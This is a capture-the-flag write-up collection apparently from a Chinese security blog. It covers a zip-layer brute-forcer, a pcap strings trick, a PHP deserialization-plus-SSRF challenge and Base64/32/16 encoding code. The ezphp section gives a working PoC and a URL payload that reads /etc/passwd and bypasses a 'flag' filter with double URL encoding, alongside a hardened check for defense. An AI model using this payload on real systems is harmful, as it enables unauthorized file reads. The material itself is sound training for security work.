    with open(str(j) + 'hint.txt', 'r') as f:
        password = f.read()
    password = password.split(" ")[2:][0]   # the third word of the hint holds the password template
    position = password.find('?')
    found = False
    for i in range(10):
        # replace the '?' with each digit in turn (position stays valid after the first replacement)
        password = password[:position] + str(i) + password[position + 1:]
        print(password)
        original_file.setpassword(password.encode())
        # original_file = zipfile.ZipFile(original_file)
        try:
            data = original_file.read("onion.zip")
            with open(str(j + 1) + "onion.zip", 'wb') as f1:
                f1.write(data)

            hint = original_file.read("hint.txt")
            with open(str(j + 1) + "hint.txt", 'wb') as f2:
                f2.write(hint)
            print("hint")
            j = j + 1
            found = True
            break
        except Exception:
            pass   # wrong password, or this layer has no inner onion.zip
    original_file.close()
    if not found:
        # nothing could be extracted from this layer: stop instead of looping forever
        print("stopped at layer " + str(j))
        break

Unpack until only the last layer is left, brute-force that one by hand and obtain the flag.

strange_ssid

strings ctf.pcap | awk '{print $1}' | grep -E '^[A-Za-z0-9]+$'
This yields a normal-looking string.
Submitting that string as-is is rejected.
Wrapping it in flag{} and submitting succeeds.

ezphp

Analysis

Opening the page gives the source

<?php

class Hello {
    protected $a;

    function test() {
        $b = strpos($this->a, 'flag');
        if($b) {
            die("Bye!");
        }
        $c = curl_init();
        curl_setopt($c, CURLOPT_URL, $this->a);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5);
        echo curl_exec($c);
    }

    function __destruct(){
        $this->test();
    }
}

if (isset($_GET["z"])) {
    unserialize($_GET["z"]);
} else {
    highlight_file(__FILE__);
}

This is SSRF combined with deserialization.
The deserialization part is simple: __destruct is guaranteed to run.
Build the following PoC to read /etc/passwd

<?php

class Hello {
    protected $a='file:///etc/passwd';

    function test() {
        $b = strpos($this->a, 'flag');
        if($b) {
            die("Bye!");
        }
        $c = curl_init();
        curl_setopt($c, CURLOPT_URL, $this->a);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5);
        echo curl_exec($c);
    }

    function __destruct(){
        $this->test();
    }
}

// if (isset($_GET["z"])) {
//     unserialize($_GET["z"]);
// } else {
//     highlight_file(__FILE__);
// }
$x = new Hello();
echo urlencode(serialize($x));

/etc/passwd is read successfully

bypass

To read the flag there is a filter to get past: the target file is flagxxx (its name starts with flag), and the check rejects that.
The file protocol works, but file:///flag cannot be read directly.
URL encoding gets around it:
encoding flag as %2566lag passes the check.

payload

?z=O%3A5%3A%22Hello%22%3A1%3A%7Bs%3A4%3A%22%00%2A%00a%22%3Bs%3A14%3A%22file%3A%2F%2F%2F%2566lag%22%3B%7D
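Why the check in test() is so easy to get past, and what a sound one looks like, as an added Python model (example code, not part of the challenge). The weak check reproduces the PHP logic exactly: strpos() returns false when 'flag' is absent and 0 when it is at the very start, and both are falsy, so `if($b)` only fires for a match after offset 0; on top of that it compares the raw, still-encoded string. The hardened check decodes repeatedly before looking at anything and, more importantly, only lets http(s) URLs with a host through, so file:// never reaches curl however the path is spelled. ALLOWED_SCHEMES and BLOCKED_SUBSTRINGS are my assumptions for the application.

```python
from urllib.parse import unquote, urlsplit


def weak_check_blocks(url: str) -> bool:
    """Model of the challenge's check: strpos($a, 'flag') is false when absent
    and 0 when 'flag' is the first thing in the string; both are falsy in PHP,
    so if($b) only fires for a match *after* offset 0, and only on the raw text."""
    pos = url.find("flag")  # -1 when absent, 0 when at the start, like strpos()
    return pos > 0


ALLOWED_SCHEMES = {"http", "https"}   # assumption: the application only needs web URLs
BLOCKED_SUBSTRINGS = ("flag",)        # kept only to show the denylist applied correctly


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the string stops changing, so multiply encoded input
    such as %2566lag (-> %66lag -> flag) is compared in its final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def hardened_check_blocks(url: str) -> bool:
    """Return True when the URL must be rejected."""
    decoded = fully_decode(url)
    parts = urlsplit(decoded)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return True            # file:// and every other non-web scheme never reach curl
    if not parts.hostname:
        return True            # scheme-only or malformed URLs are rejected too
    lowered = decoded.lower()
    return any(s in lowered for s in BLOCKED_SUBSTRINGS)
```

The scheme allowlist is the control that actually closes the file read; the substring denylist is second-order and, as the weak version shows, cannot be made reliable on its own. A production SSRF guard would additionally resolve the host and refuse loopback and private ranges.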

  1. git
  2. After unpacking, open the virtual machine; user name hancool, password qwe123
  3. cd elasticsearch-2.3.4/bin && ./elasticsearch -d
  4. cd ~ && cd wooyun_public/flask && ./app.py
  5. If the browser cannot connect, turn off Ubuntu's firewall (ufw disable)

Base64

Definition

Base64 is a method of representing binary data using 64 printable characters. Since 2^6 = 64, every 6 bits form one unit that maps to one printable character. 3 bytes are 24 bits, which correspond to 4 Base64 units, so 3 bytes can be represented by 4 printable characters. It can be used as a transfer encoding for e-mail. The printable characters in Base64 are the letters A-Z and a-z and the digits 0-9, 62 characters in total; the remaining two printable symbols differ between systems. Some other encodings, such as uuencode and later versions of BinHex, use different 64-character sets to represent 6 bits, but are not called Base64.

Base64 is commonly used to represent, transfer and store binary data in contexts that normally handle text, including MIME e-mail and some complex data in XML.

In MIME e-mail, Base64 can be used to encode a sequence of binary bytes into text made of ASCII characters; Base64 is named as the transfer encoding. The characters used are the 26 upper-case and 26 lower-case Latin letters, the 10 digits, plus (+) and slash (/), 64 characters in all; the equals sign (=) is used as a suffix.

Encoding rules

  1. Take every three bytes as a group, 24 bits in total
  2. Split those 24 bits into four groups of 6 bits each
  3. Prepend two 0 bits to each group, expanding them to 32 bits, i.e. four bytes
  4. Look up each expanded byte in the table to get its symbol; that is the Base64 encoding
  5. If the number of bytes to encode is not divisible by 3, one or two bytes remain at the end. Handle them as follows: first pad the end with zero bytes until the length is divisible by 3, then Base64-encode as usual, and append one or two = signs to the encoded text to indicate how many padding bytes were used. That is, when two padding bytes were needed (one real byte remained), the last 6-bit Base64 block has four zero bits and two = signs are appended; when one padding byte was needed (two real bytes remained), the last 6-bit block has two zero bits and one = sign is appended.

Base64 uses 64 (2^6) ASCII characters to represent 256 (2^8) byte values: three bytes become four ASCII characters after encoding, so the length grows by 1/3.

Base32

Encoding rules

Base32 is a data encoding scheme mainly used to turn binary data into a printable string. Its rule: take any binary data, split it into groups of 5 bits (Base64 uses groups of 6), and encode each group as one printable character. The Base32 alphabet has 2^5 = 32 characters, which is where the name comes from: A-Z and 2-7.

Base32 uses 32 (2^5) specific ASCII characters to represent the 256 byte values. So 5 input bytes become 8 characters after Base32 encoding (40 bits is the least common multiple of 5 and 8), a length increase of 3/5. Output that is not a multiple of 8 characters is padded with "=".

Base16

Base16 uses 16 (2^4) specific ASCII characters (0-9, A-F) to represent the 256 byte values. One byte becomes 2 characters after Base16 encoding, doubling the length. Output that is not a multiple of 2 characters is padded with "=".
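The three encodings are one algorithm with different group sizes, so as an added example (my code, not the Base64 script on this page) here is a single coder parameterised by (alphabet, bits per character, input bytes per block): 3 bytes to 4 characters for Base64, 5 to 8 for Base32, 1 to 2 for Base16. It implements rule 5 above for every scheme, zero-padding the final short block and replacing the characters that carry no real bits with "=", and the decoder drops those padding bits again. self_check() cross-checks all three against Python's standard base64 module.

```python
import base64  # standard library; used only to cross-check the hand-rolled coder

# alphabet, bits per output character, input bytes per block
SCHEMES = {
    64: ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/", 6, 3),
    32: ("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567", 5, 5),
    16: ("0123456789ABCDEF", 4, 1),
}


def basen_encode(data: bytes, base: int) -> str:
    alphabet, bits, block = SCHEMES[base]
    chars_per_block = block * 8 // bits
    mask = (1 << bits) - 1
    out = []
    for start in range(0, len(data), block):
        chunk = data[start:start + block]
        # zero-pad a short final block up to a full block (rule 5)
        value = int.from_bytes(chunk, "big") << (8 * (block - len(chunk)))
        # characters that carry at least one real bit; the rest become '='
        real_chars = -(-len(chunk) * 8 // bits)          # ceiling division
        for k in range(chars_per_block):
            shift = block * 8 - bits * (k + 1)
            out.append(alphabet[(value >> shift) & mask] if k < real_chars else "=")
    return "".join(out)


def basen_decode(text: str, base: int) -> bytes:
    alphabet, bits, block = SCHEMES[base]
    chars_per_block = block * 8 // bits
    index = {c: i for i, c in enumerate(alphabet)}
    stripped = text.rstrip("=")
    out = bytearray()
    for start in range(0, len(stripped), chars_per_block):
        chunk = stripped[start:start + chars_per_block]
        value = 0
        for c in chunk:
            value = (value << bits) | index[c]      # KeyError for a character outside the alphabet
        nbits = len(chunk) * bits
        nbytes = nbits // 8
        value >>= nbits - nbytes * 8                # drop the padding bits that belong to no byte
        out += value.to_bytes(nbytes, "big")
    return bytes(out)


def self_check() -> bool:
    """Compare every scheme with the standard library on the classic test vectors
    and on all 256 byte values."""
    samples = [b"", b"f", b"fo", b"foo", b"foob", b"fooba", b"foobar", bytes(range(256))]
    reference = {64: base64.b64encode, 32: base64.b32encode, 16: base64.b16encode}
    for base, fn in reference.items():
        for s in samples:
            enc = basen_encode(s, base)
            if enc != fn(s).decode("ascii") or basen_decode(enc, base) != s:
                return False
    return True
```

For Base16 real_chars always equals chars_per_block, so "=" never appears in practice; for Base32 a single trailing byte produces two characters and six "=" signs, which is where the padding rule is most visible.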

Script

def myBase64Encode(preCoding):
    # preCoding is bytes; the result is the Base64 text as bytes
    charTable = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'  # character table

    if len(preCoding) == 0:
        return b''  # empty input gives empty output (the original compared "< 0", which can never be true)

    lackCharNums = 3 - len(preCoding) % 3
    if lackCharNums == 3:
        lackCharNums = 0  # divisible by 3: no padding bytes needed

    # pad input whose length is not a multiple of 3
    for i in range(lackCharNums):
        preCoding = preCoding + b'\x00'

    result = ''  # final result as str
    rp = ''      # output before the padding characters are replaced

    # one round per three bytes
    for i in range(int(len(preCoding) / 3)):
        threeChar = preCoding[i*3:i*3+3]  # take three bytes
        tCode = ''  # the 24 bits of the three bytes as a binary string
        pCode = ''  # scratch variable
        for j in range(3):
            pCode = bin(threeChar[j])[2:]  # bin() drops leading zeros, so put them back
            lackZeroNums = 8 - len(pCode)  # number of dropped zeros
            for x in range(lackZeroNums):
                pCode = '0' + pCode
            tCode = tCode + pCode
            pCode = ''
        for j in range(4):  # one character per 6 bits
            pCode = tCode[j*6:j*6+6]
            rp = rp + charTable[int(pCode, 2)]

    # the characters produced by the zero padding are replaced with '='
    result = rp[:len(rp) - lackCharNums]
    for j in range(lackCharNums):
        result = result + '='

    return bytes(result, encoding="utf-8")


def myBase64Decode(encodedBin):
    # encodedBin is the Base64 text as bytes; the result is the decoded bytes
    charTable = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'  # character table

    # the length must be a multiple of 4, otherwise return empty
    if not len(encodedBin) % 4 == 0:
        return b''

    tCode = ''  # the complete bit string
    pCode = ''  # scratch variable (the original misspelled it pCpde here)

    # look each character up in the table; '=' is not in the table and is skipped
    for i in encodedBin:
        for j in range(len(charTable)):
            if chr(i) == charTable[j]:
                pCode = bin(j)[2:]  # binary without the leading 0b
                lackZeroNums = 6 - len(pCode)  # number of dropped zeros
                for x in range(lackZeroNums):
                    pCode = '0' + pCode
                tCode = tCode + pCode
                pCode = ''

    result = []  # decoded byte values

    # the padding bits belonging to '=' are fewer than 8 and are discarded by the integer division
    for i in range(int(len(tCode) / 8)):
        pCode = tCode[i*8:i*8+8]
        result.append(int(pCode, 2))

    # build the bytes directly; the original built a str with chr() and UTF-8 encoded it,
    # which turns every value above 0x7f into two bytes
    return bytes(result)

by the i春秋学院 blog